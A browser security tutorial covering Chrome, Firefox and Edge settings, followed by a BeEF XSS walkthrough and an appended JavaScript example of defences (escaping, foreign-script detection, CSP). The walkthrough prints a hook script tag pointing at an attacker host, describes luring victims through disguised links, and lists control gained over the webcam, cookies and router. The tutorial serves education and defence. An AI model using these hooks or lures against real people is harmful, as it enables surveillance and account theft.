Browser security tutorial

Introduction

For our security in general, and for the security of our PC when browsing the Internet, we need to take care of the security of our browser.

Depending on the browser used, there are settings common to all browsers and settings specific to each one.


Chrome browser

Chrome, like other browsers, has settings for the home page, font size, page zoom and the search engine used.


Within the advanced settings we can set the browser's security level (protection against dangerous sites), manage the settings for secure HTTPS connections and SSL certificates, and set the deletion of the data collected by the browser (browsing history, cookies, cache and more).


It is good practice to set the security settings to the highest level.


Firefox browser

In the settings menu, the Firefox browser contains local settings and access permissions for associated hardware devices (webcam, microphone).


There are also advanced settings for blocking pop-ups, JavaScript and dangerous downloads.


There are other settings for the security of our web surfing.


Edge Browser (IE)

The Edge browser (from Windows 10 onwards) has also increased its security settings.


You can block pop-ups and add-ons, save passwords, and set access to geolocation.


You can also manage cookies and other navigation session data.


In conclusion, regardless of the browser used, for our security we have to consider a few elements:
- keep the browser up to date.
- enable its automatic updates.
- block pop-ups, plug-ins and insecure sites.
- use appropriate cookie settings.
- use a serious, up-to-date antivirus.


However, no matter how well we protect our browser settings, it is not enough. The most important thing is not to click on any button or link, whether in an email, a web page or a social network, unless we are sure what will happen.


XSS Vulnerability of Browsers

This refers to the use and execution of JavaScript or other dangerous scripts.
As we have seen in the tutorials, JavaScript is widely used on websites to provide page interaction. Scripts are sent as instructed by the server, but executed in the client's browser. Blocking JavaScript execution in the browser is not a solution, since pages then appear truncated or with missing items.
However, cross-site scripting (XSS) vulnerabilities and attacks refer precisely to the execution of a malicious script in the client's browser, as a result of which the attacker gains access to the client's browser: passwords, browsing history, cookies, or sending commands to the webcam, the microphone, the displayed page and the alert messages of the attacked client.
We'll exemplify an attack type using the XSS browser vulnerability, using the BeEF application from Linux.


Pay attention! Do not use this app against real victims. The BeEF tool was designed to test the vulnerabilities of our own local network in order to protect us from external attacks.


BeEF (Browser Exploitation Framework)

BeEF is a testing tool for web browser security.
Kali Linux has it preinstalled.


On another Linux distribution, we install BeEF with the following commands:


#apt-get update
#apt-get install beef-xss


We start the application with the BeEF icon, which opens a Terminal:


Note that in order to access the victim's browser, the victim's browser has to run the script:


<script src="http://address_IP_attacker:3000/hook.js"></script>


where address_IP_attacker is the public IP of the attacker, 3000 is the port used, and hook.js is the JavaScript to be executed in the victim's browser.
The victim can be any user who accesses the attacker's website, which contains in its <head> section the instruction:


<script src="http://address_IP_attacker:3000/hook.js"></script>


or the victim can be chosen by sending, by email or social networking, a link to the attacker's JavaScript. The victim can be fooled, as the visible text of the link can be a reference to a photo or an interesting article.
Once the victim clicks on the sent link, the hook.js script runs in the browser and the attacker takes control of the victim's browser (the victim's browser is hooked).
To make a demonstration in the local network (without attacking any victim), the BeEF application has a demo page, which we visit at:


http://127.0.0.1:3000/demos/butcher/index.html


and which looks like this:


Click on one of the two buttons on the left and the hook.js script will be executed.
Now the attacker types in the browser:


http://127.0.0.1:3000/ui/panel


which opens the login window:


We type "beef" as both the user name and the password and log in to the application.


Click on Online Browsers and we have access to the victim's browser.


In addition to information about the browser, network, operating system and peripherals, there is the Commands menu, from which we can send commands to the victim's browser.


You can request that the webcam and microphone be turned on on the victim's PC.


You can start an audio file or a video on the victim's PC.


Social networking data can be obtained if it is saved in the browser on the victim's PC.


An administrator account can be created on the victim's router.


Even worse, the attacker has access to cookies and a variety of other browser-enabled information that allows the victim's sites and accounts to be accessed on behalf of the attacker.


It is true that after the attacker sends the command, the victim has to give an acceptance (that is, a click), but that is not an obstacle, because the text shown to the victim is customized and may appear as an application update, a warning message or an advertisement.
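The defensive counterpart to the hook injection described above, as an added example that is not part of this tutorial or of BeEF: a site protects itself by escaping untrusted text before it is rendered, by flagging script tags that load from a foreign origin, and by serving a Content-Security-Policy whose script-src does not include the foreign host. The page origin, the attacker-host.invalid placeholder and the sample HTML are constructed for this example; it runs under Node.js 18+.

```javascript
// Added example, not from the tutorial: three defensive checks against the
// "<script src=...hook.js>" injection. Requires Node.js 18+ (built-in URL).

// 1. Output encoding: untrusted text rendered into HTML is escaped, so an
//    injected script tag is shown as text instead of being executed.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, (c) => map[c]);
}

// 2. Detection: list every <script src="..."> whose origin differs from the
//    page's own origin. A hook served from another host:port stands out.
function externalScripts(html, pageOrigin) {
  const found = [];
  const page = new URL(pageOrigin);
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    let src;
    try { src = new URL(m[1], page); } catch { continue; } // skip unparsable src
    if (src.origin !== page.origin) found.push(src.href);
  }
  return found;
}

// 3. Mitigation: evaluate a simplified CSP script-src directive ('self' and
//    host sources only). With script-src 'self' the browser refuses a script
//    from any other origin even if the tag has been injected into the page.
function cspAllowsScript(scriptSrcDirective, scriptUrl, pageOrigin) {
  const page = new URL(pageOrigin);
  const target = new URL(scriptUrl, page);
  return scriptSrcDirective.split(/\s+/).filter(Boolean).some((source) => {
    if (source === "'self'") return target.origin === page.origin;
    try { return new URL(source).origin === target.origin; } catch { return false; }
  });
}

// Constructed sample: the attacker's tag next to the site's own script.
// attacker-host.invalid is a placeholder, not a real address.
const PAGE_ORIGIN = 'https://www.example.test';
const HOOK_SRC = 'http://attacker-host.invalid:3000/hook.js';
const SAMPLE_PAGE =
  `<html><head><script src="${HOOK_SRC}"></script>` +
  `<script src="/app.js"></script></head><body></body></html>`;

console.log(externalScripts(SAMPLE_PAGE, PAGE_ORIGIN));          // flags only the hook
console.log(cspAllowsScript("'self'", HOOK_SRC, PAGE_ORIGIN));   // false: blocked by CSP
console.log(escapeHtml(`<script src="${HOOK_SRC}"></script>`)); // rendered as plain text
```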
